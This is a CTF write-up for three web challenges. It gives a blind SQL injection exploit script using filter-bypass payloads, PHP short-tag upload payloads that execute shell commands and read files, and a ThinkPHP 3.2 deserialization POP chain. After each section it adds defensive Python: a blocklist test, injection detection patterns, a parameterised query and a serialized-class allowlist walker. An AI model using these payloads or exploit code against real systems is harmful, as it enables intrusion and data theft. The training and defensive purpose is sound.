## happysql

Simple fuzzing showed that `if`, the space, `or`, `and`, `information`, the single quote, `benchmark`, `sleep`, `=`, `like`, `+` and `-` are filtered, but the double quote is not. Conveniently, the challenge wraps the value in a double-quoted string, and `#` is not filtered either, so we can break out of the string cleanly. The logical operators `or` and `and` can simply be replaced with `||`, the equals sign with `regexp` or `strcmp`, and string slicing with `locate`. With `||`, as long as one side evaluates true the login redirects to `home.php`, which allows a runtime-error-based boolean blind injection (http://www.plasf.cn/articles/spatial_functions_blind_inject.html): for example `exp(710)` overflows and raises an error.

- `if` can be replaced with `make_set`, which gives a payload such as:

```
username=a"||exp(make_set((database()/**/regexp/**/binary/**/0x637466),0x373130,0x31))#&password=
```

- If the guess is correct, `exp` overflows, the SQL statement fails and the page returns `Username or password error!`.
- If the guess is wrong, the expression returns 1: `exp` does not overflow and the query runs normally.

- Because `information` is filtered, `mysql.innodb_index_stats` can be used instead, and that works. The database name was already guessed as `ctf`, so guess the table name directly:

```python
payload = {
    'username': 'a"||exp(make_set(strcmp((locate(binary/**/%s,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name/**/regexp/**/binary/**/0x637466),%s)),%s),710,1))#' % (ord2hex(j), i, i),
    'password': ''
}
```
- The table name turned out to be `f1ag`. The innodb tables cannot reveal column names, but it is easy to test that the table has exactly two columns.
- So use column-name-free injection. Putting the analysis together, the final exploit is:

```python
# coding=utf-8
import requests


def ord2hex(string):
    """Encode a string as a 0x... hex literal so the payload needs no quotes."""
    result = ""
    for i in string:
        r = hex(ord(i))
        r = r.replace('0x', '')
        result = result + r
    return '0x' + result


tables = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-}{,_'
flag = ''
url = "http://eci-2ze2jur5bqu7g7b1eaws.cloudeci1.ichunqiu.com/login.php"
for i in range(1, 70):
    for j in tables:
        payload = {
            'username': 'a"||exp(make_set(strcmp((locate(binary/**/%s,(select/**/group_concat(x.2)/**/from/**/(select/**/2/**/union/**/select/**/*/**/from/**/f1ag)x),%d)),%d),710,1))#' % (ord2hex(j), i, i),
            'password': ''
        }
        resp = requests.post(url, data=payload)
        # locate() == i  ->  strcmp() == 0  ->  make_set() selects nothing  ->  exp('') == 1,
        # so the login succeeds and we land on home.php: character i of the flag is j
        if 'home.php' in resp.text:
            flag = flag + j
            print(flag)
            break
```
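From the defender's side, the lesson of this challenge is that a keyword blocklist does not change the fact that the input is spliced into a double-quoted SQL literal. The following is an added example, not code from the write-up: it reconstructs the blocklist from the fuzzing results above (an assumption; the challenge's real filter is not on the page), shows that both payloads quoted in the write-up pass it untouched, lists the payload-shape indicators a WAF or log review could flag instead, and contrasts the string-built statement with a parameterised lookup. SQLite stands in for the challenge's MySQL, and the `users` row is constructed.

```python
import re
import sqlite3

# Blocklist reconstructed from the fuzzing results in the write-up above. This is an
# assumption made for illustration; the challenge's real filter source is not on the page.
BLOCKED_TOKENS = ["if", " ", "or", "and", "information", "'", "benchmark",
                  "sleep", "=", "like", "+", "-"]

# Two payloads quoted from the write-up, used here as sample input.
PAYLOAD_DBNAME = 'a"||exp(make_set((database()/**/regexp/**/binary/**/0x637466),0x373130,0x31))#'
PAYLOAD_FLAG = ('a"||exp(make_set(strcmp((locate(binary/**/0x41,(select/**/group_concat(x.2)/**/from/**/'
                '(select/**/2/**/union/**/select/**/*/**/from/**/f1ag)x),1)),1),710,1))#')


def passes_blocklist(value):
    """True when the challenge-style blocklist would accept the value unchanged."""
    lower = value.lower()
    return not any(tok in lower for tok in BLOCKED_TOKENS)


# Each rule names one technique the write-up relies on; together they describe the payload
# shape worth flagging, independently of which keywords the application happens to strip.
INDICATORS = {
    "comment_as_whitespace": re.compile(r"/\*\*/"),
    "quote_break_then_or": re.compile(r'"\s*\|\|'),
    "error_based_overflow": re.compile(r"\bexp\s*\(", re.I),
    "conditional_make_set": re.compile(r"\bmake_set\s*\(", re.I),
    "hex_string_literal": re.compile(r"\b0x[0-9a-f]+\b", re.I),
    "trailing_comment": re.compile(r"#\s*$"),
}


def injection_indicators(value):
    """Names of all indicator rules that fire on the value, in rule order."""
    return [name for name, rx in INDICATORS.items() if rx.search(value)]


def vulnerable_query(username, password):
    """How the challenge builds its statement: input pasted into a double-quoted literal."""
    return 'SELECT * FROM users WHERE username="%s" AND password="%s"' % (username, password)


def build_demo_db():
    """In-memory SQLite table with one constructed account, standing in for the target's MySQL."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES (?, ?)", ("admin", "s3cret"))
    return conn


def safe_lookup(conn, username, password):
    """Parameterised form: the payload is only ever compared as data, never parsed as SQL."""
    return conn.execute(
        "SELECT id FROM users WHERE username = ? AND password = ?", (username, password)
    ).fetchone()


if __name__ == "__main__":
    for p in (PAYLOAD_DBNAME, PAYLOAD_FLAG):
        print("blocklist accepts:", passes_blocklist(p), "indicators:", injection_indicators(p))
        print("string-built statement:", vulnerable_query(p, ""))
    print("parameterised lookup with payload:", safe_lookup(build_demo_db(), PAYLOAD_DBNAME, ""))
```

Run stand-alone it prints that both payloads clear the blocklist while every indicator rule fires, and that the same payload handed to the parameterised query simply matches no row. The indicator rules are a triage aid for logs and a WAF, not a replacement for parameterisation.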
## write_shell

- Simple challenge.
- Use the short open tag to bypass the filter on `php`, and `$IFS$9` in place of the space:

```
?action=upload&data=<?=`ls\$IFS\$9/`?>
```

- That directly returns the file listing:

```
!whatyouwantggggggg401.php
bin
boot
dev
etc
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
```

- Then just read it with a wildcard:

```
?action=upload&data=<?=`cat\$IFS\$9/*.ph*`?>
```
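The bypass works because the challenge only looks for the literal word `php`, which the `<?=` short tag never contains, and because `$IFS$9` is whitespace to the shell without being a space byte. As an added example (not code from the write-up), the following Python contrasts that naive check with rules that catch every PHP open-tag variant, backtick execution and `$IFS` substitution. The payload constant is the write-up's first upload payload as the server receives it; the backslashes in the write-up's URL only escape `$` for the author's shell. The rule names are constructed.

```python
import re

# Payload quoted from the write-up, in the form the server receives after URL decoding.
UPLOAD_PAYLOAD = "<?=`ls$IFS$9/`?>"


def naive_php_filter(data):
    """The kind of check the challenge used: accept unless the literal word 'php' appears.
    Returns True when the upload would be accepted."""
    return "php" not in data.lower()


# One rule per technique the write-up relies on (constructed rule names).
UPLOAD_INDICATORS = {
    "php_open_tag": re.compile(r"<\?"),         # <?php, <?= and the bare short tag <?
    "shell_exec_backtick": re.compile(r"`[^`]*`"),
    "ifs_whitespace": re.compile(r"\$\{?IFS"),  # $IFS, $IFS$9, ${IFS}
}


def hardened_php_filter(data):
    """Names of the rules that fire; an empty list means the content looks inert."""
    return [name for name, rx in UPLOAD_INDICATORS.items() if rx.search(data)]


if __name__ == "__main__":
    print("naive filter accepts payload:", naive_php_filter(UPLOAD_PAYLOAD))
    print("hardened rules fired:", hardened_php_filter(UPLOAD_PAYLOAD))
```

Content rules like these are a second line only: the primary fix is to never write attacker-controlled bytes to a path the web server will execute, so the `.php` upload destination itself is the bug.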
## easytp

- Scanning turned up the source: `www.zip`.
- ThinkPHP 3.2; the home controller has a deserialization entry point.

A POP chain found online works: https://www.jianshu.com/p/41782991b4b2

Error-based injection revealed a database named `tp` containing a table named `f14g` (I spent a long time trying to get a shell via MySQL log export before realising the flag was sitting in the database).

- Exp:

```php
<?php
namespace Think\Db\Driver {
    use PDO;
    class Mysql {
        protected $options = array(
            PDO::MYSQL_ATTR_LOCAL_INFILE => true // must be enabled to read local files
        );
        protected $config = array(
            "debug"    => 1,
            "database" => "mysql",
            "hostname" => "127.0.0.1",
            "hostport" => "3306",
            "charset"  => "utf8",
            "username" => "root",
            "password" => "123456"
        );
    }
}

namespace Think\Image\Driver {
    use Think\Session\Driver\Memcache;
    class Imagick {
        private $img;
        public function __construct() {
            $this->img = new Memcache();
        }
    }
}

namespace Think\Session\Driver {
    use Think\Model;
    class Memcache {
        protected $handle;
        public function __construct() {
            $this->handle = new Model();
        }
    }
}

namespace Think {
    use Think\Db\Driver\Mysql;
    class Model {
        protected $options = array();
        protected $pk;
        protected $data = array();
        protected $db = null;
        public function __construct() {
            $this->db = new Mysql();
            $this->options['where'] = '';
            $this->pk = 'id';
            $this->data[$this->pk] = array(
                "table" => "mysql.user where 1=updatexml(1,concat(mid((select f14g from tp.f14g),20,70),0x7e),1);#",
                "where" => "1=1"
            );
        }
    }
}

namespace {
    echo base64_encode(serialize(new Think\Image\Driver\Imagick()));
}
```
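The root cause is an endpoint that hands user-controlled, base64-encoded data to `unserialize()`, so any class in the application becomes a potential gadget. A deserializing endpoint that legitimately needs only scalars and arrays can refuse a blob before it is ever unserialized by walking the `serialize()` format and listing the classes it would instantiate. The following is an added example, not part of the write-up or of ThinkPHP: a minimal walker for PHP's serialize format (`N`, `i`, `b`, `d`, `s`, `a`, `O`) plus an allowlist check. The sample blob is hand-built here as constructed input that mirrors the chain above (Imagick -> Memcache -> Model -> Mysql) with the non-essential properties left out; the benign sample is likewise constructed.

```python
import base64

# Serialized form of the POP chain above, hand-built as constructed sample input
# (private/protected property names carry PHP's \0 markers).
SAMPLE_POP_CHAIN = (
    b'O:26:"Think\\Image\\Driver\\Imagick":1:{'
    b's:31:"\x00Think\\Image\\Driver\\Imagick\x00img";'
    b'O:29:"Think\\Session\\Driver\\Memcache":1:{'
    b's:9:"\x00*\x00handle";'
    b'O:11:"Think\\Model":1:{'
    b's:5:"\x00*\x00db";'
    b'O:21:"Think\\Db\\Driver\\Mysql":0:{}'
    b'}}}'
)

# A benign session-style value for comparison (constructed).
SAMPLE_BENIGN = b'a:1:{s:4:"user";s:5:"admin";}'


def _walk(data, pos, classes):
    """Walk one serialized value starting at pos, appending every class name met;
    returns the offset just past that value."""
    t = data[pos:pos + 1]
    if t == b"N":                       # N;
        return pos + 2
    if t in (b"i", b"b", b"d"):         # i:<n>;  b:<0|1>;  d:<float>;
        return data.index(b";", pos) + 1
    if t == b"s":                       # s:<len>:"<bytes>";  (length-prefixed, so quotes inside are safe)
        colon = data.index(b":", pos + 2)
        length = int(data[pos + 2:colon])
        return colon + 2 + length + 2
    if t == b"a":                       # a:<count>:{key;value;...}
        colon = data.index(b":", pos + 2)
        count = int(data[pos + 2:colon])
        p = colon + 2
        for _ in range(count):
            p = _walk(data, p, classes)
            p = _walk(data, p, classes)
        return p + 1
    if t == b"O":                       # O:<len>:"<class>":<count>:{prop;value;...}
        colon = data.index(b":", pos + 2)
        name_len = int(data[pos + 2:colon])
        name_start = colon + 2
        classes.append(data[name_start:name_start + name_len].decode("utf-8", "replace"))
        p = name_start + name_len + 2
        colon2 = data.index(b":", p)
        count = int(data[p:colon2])
        p = colon2 + 2
        for _ in range(count):
            p = _walk(data, p, classes)
            p = _walk(data, p, classes)
        return p + 1
    raise ValueError("unsupported or malformed serialized value at offset %d" % pos)


def php_serialized_classes(data):
    """Every class a PHP unserialize() of this blob would instantiate, outermost first."""
    classes = []
    if _walk(data, 0, classes) != len(data):
        raise ValueError("trailing bytes after serialized value")
    return classes


def gadget_classes(blob_b64, allowed=frozenset()):
    """Classes in a base64-encoded blob that fall outside the allowlist. For an endpoint that
    should only carry scalars and arrays the allowlist is empty, so any hit means reject."""
    return [c for c in php_serialized_classes(base64.b64decode(blob_b64)) if c not in allowed]


if __name__ == "__main__":
    print("POP chain instantiates:", gadget_classes(base64.b64encode(SAMPLE_POP_CHAIN)))
    print("benign blob instantiates:", gadget_classes(base64.b64encode(SAMPLE_BENIGN)))
```

In a PHP code base the equivalent guard is `unserialize($data, ['allowed_classes' => false])` on PHP 7+, or replacing serialized transport with JSON; the walker above is the same idea expressed where it can also run over captured requests in a log pipeline.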